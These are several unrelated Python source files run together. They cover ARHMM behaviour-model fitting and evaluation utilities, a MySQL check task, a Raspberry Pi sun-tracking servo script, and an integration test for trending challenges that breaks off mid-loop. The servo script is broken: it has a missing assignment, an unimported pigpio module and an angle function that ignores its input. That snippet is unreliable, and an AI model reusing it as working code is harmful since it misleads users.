'transition_kwargs': {'kappa': kappa},
'observations': hier_str + observations,
'observation_kwargs': {**{'lags': lags}, **observation_kwargs}}
# add models with recurrent transitions
for lags in n_lags_recurrent:
model_kwargs['rarhmm-%i' % lags] = {
'transitions': 'recurrent',
'observations': hier_str + observations,
'observation_kwargs': {**{'lags': lags}, **observation_kwargs}}
return model_kwargs
def fit_with_random_restarts(
K, D, obs, lags, datas, transitions='stationary', tags=None, num_restarts=5, num_iters=100,
method='em', tolerance=1e-4, save_path=None, init_type='kmeans', dist_mat=None,
cond_var_A=1e-3, cond_var_V=1e-3, cond_var_b=1e-1, **kwargs):
all_models = []
all_lps = []
if not os.path.exists(save_path):
os.makedirs(save_path)
# Fit the model with a few random restarts
for r in range(num_restarts):
print("Restart ", r)
np.random.seed(r)
# build model file
model_kwargs = {
'transitions': transitions,
'observations': obs,
'observation_kwargs': {'lags': lags},
}
model_name = get_model_name(K, model_kwargs)
save_file = os.path.join(save_path, model_name + '_init-%i.pkl' % r)
print(save_file)
if os.path.exists(save_file):
print('loading results from %s' % save_file)
with open(save_file, 'rb') as f:
results = pickle.load(f)
model = results['model']
lps = results['lps']
else:
observation_kwargs = dict(lags=lags)
if obs.find('hierarchical') > -1:
observation_kwargs['cond_variance_A'] = cond_var_A
observation_kwargs['cond_variance_V'] = cond_var_V
observation_kwargs['cond_variance_b'] = cond_var_b
observation_kwargs['cond_dof_Sigma'] = 10
observation_kwargs['tags'] = np.unique(tags)
if transitions.find('hierarchical') > -1:
transition_kwargs = {'tags': np.unique(tags)}
else:
transition_kwargs = None
model = HMM(
K, D,
observations=obs, observation_kwargs=observation_kwargs,
transitions=transitions, transition_kwargs=transition_kwargs)
init_model(init_type, model, datas, dist_mat=dist_mat)
lps = model.fit(
datas, tags=tags, method=method, tolerance=tolerance,
num_iters=num_iters, # em
# num_epochs=num_iters, # stochastic em
initialize=False,
**kwargs)
results = {'model': model, 'lps': lps}
with open(save_file, 'wb') as f:
pickle.dump(results, f)
all_models.append(model)
all_lps.append(lps)
if isinstance(lps, tuple):
best_model_idx = np.argmax([lps[0][-1] for lps in all_lps])
else:
best_model_idx = np.argmax([lps[-1] for lps in all_lps])
best_model = all_models[best_model_idx]
best_lps = all_lps[best_model_idx]
return best_model, best_lps, all_models, all_lps
def init_model(init_type, model, datas, inputs=None, masks=None, tags=None, dist_mat=None):
"""Initialize ARHMM model according to one of several schemes.
The different schemes correspond to different ways of assigning discrete states to the data
points; once these states have been assigned, linear regression is used to estimate the model
parameters (dynamics matrices, biases, covariance matrices)
* init_type = random: states are randomly and uniformly assigned
* init_type = kmeans: perform kmeans clustering on data; note that this is not a great scheme
for arhmms on the fly data, because the fly is often standing still in many different
poses. These poses will be assigned to different clusters, thus breaking the "still" state
into many initial states
* init_type = diff-clust: perform kmeans clustering on differenced data
* init_type = pca_me: first compute the motion energy of the data (square of differences of
consecutive time points) and then perform PCA. A threshold applied to the first dimension
does a reasonable job of separating the data into "moving" and "still" timepoints. All
"still" timepoints are assigned one state, and the remaining timepoints are clustered using
kmeans with (K-1) clusters
* init_type = arhmm: refinement of pca_me approach: perform pca on the data and take top 4
components (to speed up computation) and fit a 2-state arhmm to roughly split the data into
"still" and "moving" states (this is itself initialized with pca_me). Then as before the
moving state is clustered into K-1 states using kmeans.
Args:
init_type (str):
'random' | 'kmeans' | 'pca_me' | 'arhmm'
model (ssm.HMM object):
datas (list of np.ndarrays):
inputs (list of np.ndarrays):
masks (list of np.ndarrays):
tags (list of np.ndarrays):
"""
from ssm.util import one_hot
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from scipy.signal import savgol_filter
from scipy.stats import norm
Ts = [data.shape[0] for data in datas]
K = model.K
D = model.observations.D
M = model.observations.M
lags = model.observations.lags
if inputs is None:
inputs = [np.zeros((data.shape[0],) + (M,)) for data in datas]
elif not isinstance(inputs, (list, tuple)):
inputs = [inputs]
if masks is None:
masks = [np.ones_like(data, dtype=bool) for data in datas]
elif not isinstance(masks, (list, tuple)):
masks = [masks]
if tags is None:
tags = [None] * len(datas)
elif not isinstance(tags, (list, tuple)):
tags = [tags]
# --------------------------
# initialize discrete states
# --------------------------
if init_type == 'random':
zs = [np.random.choice(K, size=T) for T in Ts]
elif init_type == 'umap-kmeans':
import umap
u = umap.UMAP()
xs = u.fit_transform(np.vstack(datas))
km = KMeans(K)
km.fit(xs)
zs = np.split(km.labels_, np.cumsum(Ts)[:-1])
elif init_type == 'umap-kmeans-diff':
import umap
u = umap.UMAP()
datas_diff = [np.vstack([np.zeros((1, D)), np.diff(data, axis=0)]) for data in datas]
xs = u.fit_transform(np.vstack(datas_diff))
km = KMeans(K)
km.fit(xs)
zs = np.split(km.labels_, np.cumsum(Ts)[:-1])
elif init_type == 'kmeans':
km = KMeans(K)
km.fit(np.vstack(datas))
zs = np.split(km.labels_, np.cumsum(Ts)[:-1])
elif init_type == 'kmeans-diff':
km = KMeans(K)
datas_diff = [np.vstack([np.zeros((1, D)), np.diff(data, axis=0)]) for data in datas]
km.fit(np.vstack(datas_diff))
zs = np.split(km.labels_, np.cumsum(Ts)[:-1])
elif init_type == 'kmeans-move':
D_ = 4
if datas[0].shape[1] > D_:
# perform pca
pca = PCA(D_)
xs = pca.fit_transform(np.vstack(datas))
xs = np.split(xs, np.cumsum(Ts)[:-1])
else:
# keep original data
import copy
D_ = D
xs = copy.deepcopy(datas)
model_init = HMM(
K=2, D=D_, M=0, transitions='standard', observations='ar',
observations_kwargs={'lags': 1})
init_model('pca-me', model_init, xs)
model_init.fit(
xs, inputs=None, method='em', num_iters=100, tolerance=1e-2,
initialize=False, transitions_mstep_kwargs={'optimizer': 'lbfgs', 'tol': 1e-3})
# make still state 0th state
mses = [np.mean(np.square(model_init.observations.As[i] - np.eye(D_))) for i in range(2)]
if mses[1] < mses[0]:
# permute states
model_init.permute([1, 0])
moving_state = 1
inputs_tr = [None] * len(datas)
zs = [model_init.most_likely_states(x, u) for x, u in zip(xs, inputs_tr)]
zs = np.concatenate(zs, axis=0)
# cluster moving data
km = KMeans(K - 1)
if np.sum(zs == moving_state) > K - 1:
datas_diff = [np.vstack([np.zeros((1, D)), np.diff(data, axis=0)]) for data in datas]
km.fit(np.vstack(datas_diff)[zs == moving_state])
zs[zs == moving_state] = km.labels_ + 1
# split
zs = np.split(zs, np.cumsum(Ts)[:-1])
elif init_type == 'ar-clust':
from sklearn.cluster import SpectralClustering # , AgglomerativeClustering
# code from Josh Glaser
t_win = 5
t_gap = 5
num_trials = len(datas)
if dist_mat is None:
dist_mat = compute_dist_mat(datas, t_win, t_gap)
# Cluster!
clustering = SpectralClustering(n_clusters=K, affinity='precomputed').fit(
1 / (1 + dist_mat / t_win))
# Now take the clustered segments, and use them to determine the cluster of the individual
# time points
# In the scenario where the segments are nonoverlapping, then we can simply assign the time
# point cluster as its segment cluster
# In the scenario where the segments are overlapping, we will let a time point's cluster be
# the cluster to which the majority of its segments belonged
# Below zs_init is the assigned discrete states of each time point for a trial. zs_init2
# tracks the clusters of each time point across all the segments it's part of
zs = []
for tr in range(num_trials):
xhat = datas[tr]
T = xhat.shape[0]
n_steps = int((T - t_win) / t_gap) + 1
t_st = 0
zs_init = np.zeros(T)
zs_init2 = np.zeros([T, K]) # For each time point, tracks how many segments it's
# part of belong to each cluster
for k in range(n_steps):
t_end = t_st + t_win
t_idx = np.arange(t_st, t_end)
if t_gap == t_win:
zs_init[t_idx] = clustering.labels_[k]
else:
zs_init2[t_idx, clustering.labels_[k]] += 1
t_st = t_st + t_gap
if t_gap != t_win:
max_els = zs_init2.max(axis=1)
for t in range(T):
if np.sum(zs_init2[t] == max_els[t]) == 1:
# if there's a single best cluster, assign it
zs_init[t] = np.where(zs_init2[t] == max_els[t])[0]
else:
# multiple best clusters
if zs_init[t - 1] in np.where(zs_init2[t] == max_els[t])[0]:
# use best cluster from previous time point if it's in the running
zs_init[t] = zs_init[t - 1]
else:
# just use first element
zs_init[t] = np.where(zs_init2[t] == max_els[t])[0][0]
# I think this offset is correct rather than just using zs_init, but it should be
# double checked.
zs.append(np.concatenate([[0], zs_init[:-1]]))
zs = np.concatenate(zs, axis=0)
# split
zs = np.split(zs, np.cumsum(Ts)[:-1])
elif init_type == 'arhmm':
D_ = 4
if datas[0].shape[1] > D_:
# perform pca
pca = PCA(D_)
xs = pca.fit_transform(np.vstack(datas))
xs = np.split(xs, np.cumsum(Ts)[:-1])
else:
# keep original data
import copy
D_ = D
xs = copy.deepcopy(datas)
model_init = HMM(
K=2, D=D_, M=0, transitions='standard', observations='ar',
observations_kwargs={'lags': 1})
init_model('pca-me', model_init, xs)
model_init.fit(
xs, inputs=None, method='em', num_iters=100, tolerance=1e-2,
initialize=False, transitions_mstep_kwargs={'optimizer': 'lbfgs', 'tol': 1e-3})
# make still state 0th state
mses = [np.mean(np.square(model_init.observations.As[i] - np.eye(D_))) for i in range(2)]
if mses[1] < mses[0]:
# permute states
model_init.permute([1, 0])
moving_state = 1
inputs_tr = [None] * len(datas)
zs = [model_init.most_likely_states(x, u) for x, u in zip(xs, inputs_tr)]
zs = np.concatenate(zs, axis=0)
# cluster moving data
km = KMeans(K - 1)
if np.sum(zs == moving_state) > K - 1:
km.fit(np.vstack(datas)[zs == moving_state])
zs[zs == moving_state] = km.labels_ + 1
# split
zs = np.split(zs, np.cumsum(Ts)[:-1])
elif init_type == 'pca-me':
# pca on motion energy
datas_filt = np.copy(datas)
for dtmp in datas_filt:
for i in range(dtmp.shape[1]):
dtmp[:, i] = savgol_filter(dtmp[:, i], 5, 2)
pca = PCA(1)
me = np.square(np.diff(np.vstack(datas_filt), axis=0))
xs = pca.fit_transform(np.concatenate([np.zeros((1, D)), me], axis=0))[:, 0]
xs = xs / np.max(xs)
# threshold data to get moving/non-moving
thresh = 0.01
zs = np.copy(xs)
zs[xs < thresh] = 0
zs[xs >= thresh] = 1
# cluster moving data
km = KMeans(K - 1)
km.fit(np.vstack(datas)[zs == 1])
zs[zs == 1] = km.labels_ + 1
# split
zs = np.split(zs, np.cumsum(Ts)[:-1])
else:
raise NotImplementedError('Invalid "init_type" of "%s"' % init_type)
# ------------------------
# estimate dynamics params
# ------------------------
if init_type != 'em-exact':
Ezs = [one_hot(z, K) for z in zs]
expectations = [(Ez, None, None) for Ez in Ezs]
if str(model.observations.__class__).find('Hierarchical') > -1:
obs = model.observations
# initialize parameters for global ar model
obs.global_ar_model.m_step(expectations, datas, inputs, masks, tags)
# update prior
obs._update_hierarchical_prior()
# Copy global parameters to per-group models
for ar in obs.per_group_ar_models:
ar.As = obs.global_ar_model.As.copy()
ar.Vs = obs.global_ar_model.Vs.copy()
ar.bs = obs.global_ar_model.bs.copy()
ar.Sigmas = obs.global_ar_model.Sigmas.copy()
ar.As = norm.rvs(obs.global_ar_model.As, np.sqrt(obs.cond_variance_A))
ar.Vs = norm.rvs(obs.global_ar_model.Vs, np.sqrt(obs.cond_variance_V))
ar.bs = norm.rvs(obs.global_ar_model.bs, np.sqrt(obs.cond_variance_b))
ar.Sigmas = obs.global_ar_model.Sigmas.copy()
else:
model.observations.m_step(expectations, datas, inputs, masks, tags)
return None
def compute_dist_mat(datas, t_win, t_gap):
def sse(x, y):
return np.sum(np.square(x - y))
from sklearn.linear_model import Ridge
Ts = [data.shape[0] for data in datas]
num_trials = len(datas)
# Elements of segs contain triplets of
# 1) trial
# 2) time point of beginning of segment
# 3) time point of end of segment
segs = []
# Get all segments based on predefined t_win and t_gap
for tr in range(num_trials):
T = Ts[tr]
n_steps = int((T - t_win) / t_gap) + 1
for k in range(n_steps):
segs.append([tr, k * t_gap, k * t_gap + t_win])
# Fit a regression (solve for the dynamics matrix) within each segment
num_segs = len(segs)
sse_mat = np.zeros([num_segs, num_segs])
for j, seg in enumerate(segs):
[tr, t_st, t_end] = seg
X = datas[tr][t_st:t_end + 1, :]
rr = Ridge(alpha=1, fit_intercept=True)
rr.fit(X[:-1], X[1:] - X[:-1])
# Then see how well the dynamics from segment J works at making predictions on
# segment K (determined via sum squared error of predictions)
for k, seg2 in enumerate(segs):
[tr, t_st, t_end] = seg2
X = datas[tr][t_st:t_end + 1, :]
sse_mat[j, k] = sse(X[1:] - X[:-1], rr.predict(X[:-1]))
# Make "sse_mat" into a proper, symmetric distance matrix for clustering
tmp = sse_mat - np.diag(sse_mat)
dist_mat = tmp + tmp.T
return dist_mat
# -------------------------------------------------------------------------------------------------
# model evaluation functions
# -------------------------------------------------------------------------------------------------
def extract_state_runs(states, indxs, min_length=20):
"""
Find contiguous chunks of data with the same state
Args:
states (list):
indxs (list):
min_length (int):
Returns:
list
"""
K = len(np.unique(np.concatenate([np.unique(s) for s in states])))
state_snippets = [[] for _ in range(K)]
for curr_states, curr_indxs in zip(states, indxs):
i_beg = 0
curr_state = curr_states[i_beg]
curr_len = 1
for i in range(1, len(curr_states)):
next_state = curr_states[i]
if next_state != curr_state:
# record indices if state duration long enough
if curr_len >= min_length:
state_snippets[curr_state].append(
curr_indxs[i_beg:i])
i_beg = i
curr_state = next_state
curr_len = 1
else:
curr_len += 1
# end of trial cleanup
if next_state == curr_state:
# record indices if state duration long enough
if curr_len >= min_length:
state_snippets[curr_state].append(curr_indxs[i_beg:i])
return state_snippets
def viterbi_ll(model, datas):
"""Calculate log-likelihood of viterbi path."""
inputs = [None] * len(datas)
masks = [None] * len(datas)
tags = [None] * len(datas)
states = [model.most_likely_states(x, u) for x, u in zip(datas, inputs)]
ll = 0
for data, input, mask, tag, state in zip(datas, inputs, masks, tags, states):
if input is None:
input = np.zeros_like(data)
if mask is None:
mask = np.ones_like(data, dtype=bool)
likelihoods = model.observations.log_likelihoods(data, input, mask, tag)
ll += np.sum(likelihoods[(np.arange(state.shape[0]), state)])
return ll
def k_step_ll(model, datas, k_max):
"""Determine the k-step ahead ll."""
M = (model.M,) if isinstance(model.M, int) else model.M
L = model.observations.lags # AR lags
k_step_lls = 0
for data in datas:
input = np.zeros((data.shape[0],) + M)
mask = np.ones_like(data, dtype=bool)
pi0 = model.init_state_distn.initial_state_distn
Ps = model.transitions.transition_matrices(data, input, mask, tag=None)
lls = model.observations.log_likelihoods(data, input, mask, tag=None)
T, K = lls.shape
# Forward pass gets the predicted state at time t given
# observations up to and including those from time t
alphas = np.zeros((T, K))
forward_pass(pi0, Ps, lls, alphas)
# pz_tt = p(z_{t}, x_{1:t}) = alpha(z_t) / p(x_{1:t})
pz_tt = np.exp(alphas - logsumexp(alphas, axis=1, keepdims=True))
log_likes_list = []
for k in range(k_max + 1):
if k == 0:
# p(x_t | x_{1:T}) = \sum_{z_t} p(x_t | z_t) p(z_t | x_{1:t})
pz_tpkt = np.copy(pz_tt)
assert np.allclose(np.sum(pz_tpkt, axis=1), 1.0)
log_likes_0 = logsumexp(lls[k_max:] + np.log(pz_tpkt[k_max:]), axis=1)
# pred_data = get_predicted_obs(model, data, pz_tpkt)
else:
if k == 1:
# p(z_{t+1} | x_{1:t}) =
# \sum_{z_t} p(z_{t+1} | z_t) alpha(z_t) / p(x_{1:t})
pz_tpkt = np.copy(pz_tt)
# p(z_{t+k} | x_{1:t}) =
# \sum_{z_{t+k-1}} p(z_{t+k} | z_{t+k-1}) p(z_{z+k-1} | x_{1:t})
if Ps.shape[0] == 1: # stationary transition matrix
pz_tpkt = np.matmul(pz_tpkt[:-1, None, :], Ps)[:, 0, :]
else: # dynamic transition matrix
pz_tpkt = np.matmul(pz_tpkt[:-1, None, :], Ps[k - 1:])[:, 0, :]
assert np.allclose(np.sum(pz_tpkt, axis=1), 1.0)
# p(x_{t+k} | x_{1:t}) =
# \sum_{z_{t+k}} p(x_{t+k} | z_{t+k}) p(z_{t+k} | x_{1:t})
log_likes = logsumexp(lls[k:] + np.log(pz_tpkt), axis=1)
# compute summed ll only over timepoints that are valid for each value of k
log_likes_0 = log_likes[k_max - k:]
log_likes_list.append(np.sum(log_likes_0))
k_step_lls += np.array(log_likes_list)
return k_step_lls
def k_step_r2(
model, datas, k_max, n_samp=10, obs_noise=True, disc_noise=True, return_type='total_r2'):
"""Determine the k-step ahead r2.
Args:
model:
datas:
k_max:
n_samp:
obs_noise: bool
turn observation noise on/off
disc_noise: bool
turn discrete state sampling on/off
return_type:
'per_batch_r2'
'total_r2'
'bootstrap_r2'
'per_batch_mse'
Returns:
"""
N = len(datas)
L = model.observations.lags # AR lags
D = model.D
x_true_total = []
x_pred_total = [[] for _ in range(k_max)]
if return_type == 'per_batch_r2':
k_step_r2s = np.zeros((N, k_max, n_samp))
elif return_type == 'total_r2':
k_step_r2s = np.zeros((k_max, n_samp))
else:
raise NotImplementedError('"%s" is not a valid return type' % return_type)
for d, data in enumerate(datas):
# print('%i/%i' % (d + 1, len(datas)))
T = data.shape[0]
x_true_all = data[L + k_max - 1: T + 1]
x_pred_all = np.zeros((n_samp, (T - 1), D, k_max))
if not disc_noise:
zs = model.most_likely_states(data)
inputs = np.zeros((T,) + (model.observations.M,))
# collect sampled data
for t in range(L - 1, T):
# find the most likely discrete state at time t based on its past
if disc_noise:
data_t = data[:t + 1]
zs = model.most_likely_states(data_t)[-L:]
else:
pass
# sample forward in time n_samp times
for n in range(n_samp):
# sample forward in time k_max steps
if disc_noise:
_, x_pred = model.sample(
k_max, prefix=(zs, data_t[-L:]), with_noise=obs_noise)
else:
pad = L
x_pred = np.concatenate((data[t - L + 1:t + 1], np.zeros((k_max, D))))
for k in range(pad, pad + k_max):
if t + 1 + k - pad < T:
x_pred[k, :] = model.observations.sample_x(
zs[t + 1 + k - pad], x_pred[:k], input=inputs[t], tag=None,
with_noise=obs_noise)
else:
# beyond the end of the data sample; return zeros
pass
x_pred = x_pred[pad:]
# predicted x values in the forward prediction time
x_pred_all[n, t - L + 1, :, :] = np.transpose(x_pred)[None, None, :, :]
# store predicted data
x_true_total.append(x_true_all)
for k in range(k_max):
idxs = (k_max - k - 1, k_max - k - 1 + x_true_all.shape[0])
x_pred_total[k].append(x_pred_all[:, slice(*idxs), :, k])
# compute r2s
if return_type == 'per_batch_r2':
for d in range(len(datas)):
for k in range(k_max):
for n in range(n_samp):
k_step_r2s[d, k, n] = r2_score(
x_true_total[d], x_pred_total[k][d][n])
elif return_type == 'total_r2':
for k in range(k_max):
for n in range(n_samp):
k_step_r2s[k, n] = r2_score(
np.vstack(x_true_total),
np.vstack([x_pred_total[k][d][n] for d in range(len(datas))]))
return k_step_r2s
# -------------------------------------------------------------------------------------------------
# path handling functions
# -------------------------------------------------------------------------------------------------
def get_model_name(n_states, model_kwargs):
trans = model_kwargs['transitions']
obs = model_kwargs['observations']
if obs.find('ar') > -1:
lags = model_kwargs['observation_kwargs']['lags']
else:
lags = 0
if trans == 'sticky':
kappa = model_kwargs['transition_kwargs']['kappa']
else:
kappa = ''
model_name = str(
'obs=%s_trans=%s_lags=%i_K=%02i' % (obs, trans, lags, n_states))
if trans == 'sticky':
model_name = str('%s_kappa=%1.0e' % (model_name, kappa))
return model_name
def plot_latents_states(
latents=None, states=None, state_probs=None, slc=(0, 1000), m=20):
"""
states | state probs | x coords | y coords
Args:
latents (dict): keys are 'x', 'y', 'l', each value is a TxD np array
states (np array): length T
state_probs (np array): T x K
"""
n_dlc_comp = latents.shape[1]
if state_probs is not None:
fig, axes = plt.subplots(
3, 1, figsize=(12, 10),
gridspec_kw={'height_ratios': [0.1, 0.1, 0.4]})
else:
fig, axes = plt.subplots(
2, 1, figsize=(10, 10),
gridspec_kw={'height_ratios': [0.1, 0.4]})
i = 0
axes[i].imshow(states[None, slice(*slc)], aspect='auto', cmap='tab20b')
axes[i].set_xticks([])
axes[i].set_yticks([])
axes[i].set_title('State')
# if state_probs is not None:
# i += 1
# n_states = state_probs.shape[1]
# xs_ = [np.arange(slc[0], slc[1]) for _ in range(n_states)]
# ys_ = [state_probs[slice(*slc), j] for j in range(n_states)]
# cs_ = [j for j in range(n_states)]
# _multiline(xs_, ys_, ax=axes[i], c=cs_, alpha=0.8, cmap='tab20b', lw=3)
# axes[i].set_xticks([])
# axes[i].set_xlim(slc[0], slc[1])
# axes[i].set_yticks([])
# axes[i].set_ylim(-0.1, 1.1)
# axes[i].set_title('State probabilities')
i += 1
behavior = m * latents / np.max(np.abs(latents)) + \
np.arange(latents.shape[1])
axes[i].plot(np.arange(slc[0], slc[1]), behavior[slice(*slc), :])
axes[i].set_xticks([])
axes[i].set_xlim(slc[0], slc[1])
axes[i].set_yticks([])
axes[i].set_ylim(0, n_dlc_comp + 1)
axes[-1].set_xlabel('Time (bins)')
plt.tight_layout()
plt.show()
return fig
|
#! /usr/bin/env python
# --coding:utf-8--
# coding: utf-8
# ━━━━━━神兽出没━━━━━━
# ┏┓ ┏┓
# ┏┛┻━━━┛┻┓
# ┃ ┃
# ┃ ━ ┃
# ┃ ┳┛ ┗┳ ┃
# ┃ ┃
# ┃ ┻ ┃
# ┃ ┃
# ┗━┓ ┏━┛
# ┃ ┃神兽保佑, 永无BUG!
# ┃ ┃Code is far away from bug with the animal protecting
# ┃ ┗━━━┓
# ┃ ┣┓
# ┃ ┏┛
# ┗┓┓┏━┳┓┏┛
# ┃┫┫ ┃┫┫
# ┗┻┛ ┗┻┛
# ━━━━━━感觉萌萌哒━━━━━━
# Module Desc:clover
# User: z.mm | [email protected]
# Date: 2016/1/20
# Time: 14:58
from web.service.CheckService import CheckService
__author__ = 'Administrator'
class MysqlTask(object):
def __init__(self, serverId,port, host):
self.host = host
self.port = port
self.serverId=serverId
self.c = CheckService()
def check(self):
data = self.c.mysqlCheck(self.host, port=self.port)
key = str(self.serverId)+":"+self.host +":"+ self.port +":mysql"
CheckService.checkStatue[key] = data
# print MysqlTask(2,"3306","127.0.0.1").check() |
from math import pi, radians
import socket
import struct
import find_sun
import test_light_system as ls
VIEWER_ADDR ('172.16.164.208', 43521)
class Servo:
def __init__(self, pin=18, minval=520, maxval=2240, wincount=8):
self.pi = pigpio.pi()
self.pin = pin
self.minval = minval
self.maxval = maxval
self.wincount = wincount
def setwindow(self, number):
value = self.minval + (self.maxval - self.minval) / (self.wincount - 1) * number
self.pi.set_servo_pulsewidth(self.pin, value)
def setangle(self, radians):
radians %= 2 * pi
value = self.minval + (self.maxval - self.minval) / 2 * pi
self.pi.set_servo_pulsewidth(self.pin, value)
if __name__ == "__main__":
ss = find_sun.Sun_seeker()
sock = socket.socket()
sock.connect(VIEWER_ADDR)
Servo1 = Servo(pin=17) #TODO define min and max val precisely
Servo2 = Servo(pin=18)
while True:
direction = ss.get_sun_vector()
sock.send(struct.pack('<3f', *direction))
direction = ls.dekart_to_euler(direction)
Servo1.setangle(radians(direction[0]))
Servo2.setangle(radians(direction[1])) |
from .get_links_directly import get_links_directly
from .get_links_using_Google_search import get_links_using_Google_search
from .find_links_by_extension import find_links_by_extension
|
import logging
from datetime import date, datetime, timedelta
import redis
from integration_tests.utils import populate_mock_db
from sqlalchemy.sql.expression import or_
from src.challenges.challenge_event_bus import ChallengeEvent, ChallengeEventBus
from src.challenges.trending_challenge import (
should_trending_challenge_update,
trending_playlist_challenge_manager,
trending_track_challenge_manager,
trending_underground_track_challenge_manager,
)
from src.models import TrendingResult
from src.models.models import Challenge, UserChallenge
from src.tasks.calculate_trending_challenges import enqueue_trending_challenges
from src.tasks.index_aggregate_plays import _update_aggregate_plays
from src.trending_strategies.trending_strategy_factory import TrendingStrategyFactory
from src.trending_strategies.trending_type_and_version import TrendingType
from src.utils.config import shared_config
from src.utils.db_session import get_db
REDIS_URL = shared_config["redis"]["url"]
BLOCK_NUMBER = 10
logger = logging.getLogger(__name__)
trending_strategy_factory = TrendingStrategyFactory()
def test_trending_challenge_should_update(app):
with app.app_context():
db = get_db()
with db.scoped_session() as session:
# ========== Test timestamp w/out trending result in DB ==========
# If the timestamp is outside of threshold and nothing in db
# Wrong time, wrong day
timestamp = 1629132028
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert not should_update
# Right time, wrong day
timestamp = 1629140400
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert not should_update
# wrong time, right day
timestamp = 1629489600
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert not should_update
# Within bounds
timestamp = 1629486000
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert should_update
# ========== Test working timestamp with trending result in DB ==========
session.add(
TrendingResult(
user_id=1,
rank=1,
id="1",
type="tracks",
version="ePWJD",
week="2021-08-20",
)
)
session.flush()
# Test same date as inserted trending result, so return false
timestamp = 1629486000
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert not should_update
# Test week after inserted trending result, so return true
timestamp = 1630090800
should_update, timestamp = should_trending_challenge_update(session, timestamp)
assert should_update
def test_trending_challenge_job(app):
with app.app_context():
db = get_db()
redis_conn = redis.Redis.from_url(url=REDIS_URL)
test_entities = {
"tracks": [
{"track_id": 1, "owner_id": 1},
{"track_id": 2, "owner_id": 2},
{"track_id": 3, "owner_id": 3},
{"track_id": 4, "owner_id": 4},
{"track_id": 5, "owner_id": 5},
{"track_id": 6, "owner_id": 2},
{"track_id": 7, "owner_id": 3},
{"track_id": 8, "owner_id": 3},
{"track_id": 9, "is_unlisted": True, "owner_id": 3},
{"track_id": 11, "owner_id": 1},
{"track_id": 12, "owner_id": 2},
{"track_id": 13, "owner_id": 3},
{"track_id": 14, "owner_id": 4},
{"track_id": 15, "owner_id": 5},
],
"playlists": [
{
"playlist_id": 1,
"playlist_owner_id": 1,
"playlist_name": "name",
"description": "description",
"playlist_contents": {
"track_ids": [
{"track": 1, "time": 1},
{"track": 2, "time": 2},
{"track": 3, "time": 3},
]
},
},
{
"playlist_id": 2,
"playlist_owner_id": 2,
"playlist_name": "name",
"description": "description",
"playlist_contents": {
"track_ids": [
{"track": 1, "time": 1},
{"track": 2, "time": 2},
{"track": 3, "time": 3},
]
},
},
{
"playlist_id": 3,
"is_album": True,
"playlist_owner_id": 3,
"playlist_name": "name",
"description": "description",
"playlist_contents": {
"track_ids": [
{"track": 1, "time": 1},
{"track": 2, "time": 2},
{"track": 3, "time": 3},
]
},
},
{
"playlist_id": 4,
"playlist_owner_id": 4,
"playlist_name": "name",
"description": "description",
"playlist_contents": {
"track_ids": [
{"track": 1, "time": 1},
{"track": 2, "time": 2},
{"track": 3, "time": 3},
]
},
},
{
"playlist_id": 5,
"playlist_owner_id": 5,
"playlist_name": "name",
"description": "description",
"playlist_contents": {
"track_ids": [
{"track": 1, "time": 1},
{"track": 2, "time": 2},
{"track": 3, "time": 3},
]
},
},
],
"users": [
{"user_id": 1, "handle": "user1"},
{"user_id": 2, "handle": "user2"},
{"user_id": 3, "handle": "user3"},
{"user_id": 4, "handle": "user4"},
{"user_id": 5, "handle": "user5"},
],
"follows": [
{
"follower_user_id": 1,
"followee_user_id": 2,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 1,
"followee_user_id": 3,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 2,
"followee_user_id": 3,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 2,
"followee_user_id": 4,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 3,
"followee_user_id": 6,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 4,
"followee_user_id": 5,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 5,
"followee_user_id": 1,
"created_at": datetime.now() - timedelta(days=8),
},
{
"follower_user_id": 6,
"followee_user_id": 3,
"created_at": datetime.now() - timedelta(days=8),
},
],
"reposts": [
{"repost_item_id": 1, "repost_type": "track", "user_id": 2},
{"repost_item_id": 1, "repost_type": "playlist", "user_id": 2},
{"repost_item_id": 3, "repost_type": "track", "user_id": 3},
{"repost_item_id": 1, "repost_type": "playlist", "user_id": 3},
{"repost_item_id": 4, "repost_type": "track", "user_id": 1},
{"repost_item_id": 5, "repost_type": "track", "user_id": 1},
{"repost_item_id": 6, "repost_type": "track", "user_id": 1},
],
"saves": [
{"save_item_id": 1, "save_type": "track", "user_id": 2},
{"save_item_id": 1, "save_type": "track", "user_id": 3},
{"save_item_id": 4, "save_type": "track", "user_id": 1},
{"save_item_id": 5, "save_type": "track", "user_id": 1},
{"save_item_id": 6, "save_type": "track", "user_id": 1},
{"save_item_id": 1, "save_type": "playlist", "user_id": 4},
{"save_item_id": 2, "save_type": "playlist", "user_id": 3},
{"save_item_id": 3, "save_type": "playlist", "user_id": 2},
{"save_item_id": 4, "save_type": "playlist", "user_id": 1},
{"save_item_id": 5, "save_type": "playlist", "user_id": 2},
],
"plays": [{"item_id": 1} for _ in range(55)]
+ [{"item_id": 2} for _ in range(60)]
+ [{"item_id": 3} for _ in range(70)]
+ [{"item_id": 4} for _ in range(90)]
+ [{"item_id": 5} for _ in range(80)]
+ [{"item_id": 6} for _ in range(40)]
+ [{"item_id": 11} for _ in range(200)]
+ [{"item_id": 12} for _ in range(200)]
+ [{"item_id": 13} for _ in range(200)]
+ [{"item_id": 14} for _ in range(200)]
+ [{"item_id": 15} for _ in range(200)],
}
populate_mock_db(db, test_entities, BLOCK_NUMBER + 1)
bus = ChallengeEventBus(redis_conn)
# Register events with the bus
bus.register_listener(
ChallengeEvent.trending_underground,
trending_underground_track_challenge_manager,
)
bus.register_listener(
ChallengeEvent.trending_track, trending_track_challenge_manager
)
bus.register_listener(
ChallengeEvent.trending_playlist, trending_playlist_challenge_manager
)
trending_date = date.fromisoformat("2021-08-20")
with db.scoped_session() as session:
_update_aggregate_plays(session)
session.execute("REFRESH MATERIALIZED VIEW aggregate_track")
session.execute("REFRESH MATERIALIZED VIEW aggregate_interval_plays")
session.execute("REFRESH MATERIALIZED VIEW trending_params")
trending_track_versions = trending_strategy_factory.get_versions_for_type(
TrendingType.TRACKS
).keys()
for version in trending_track_versions:
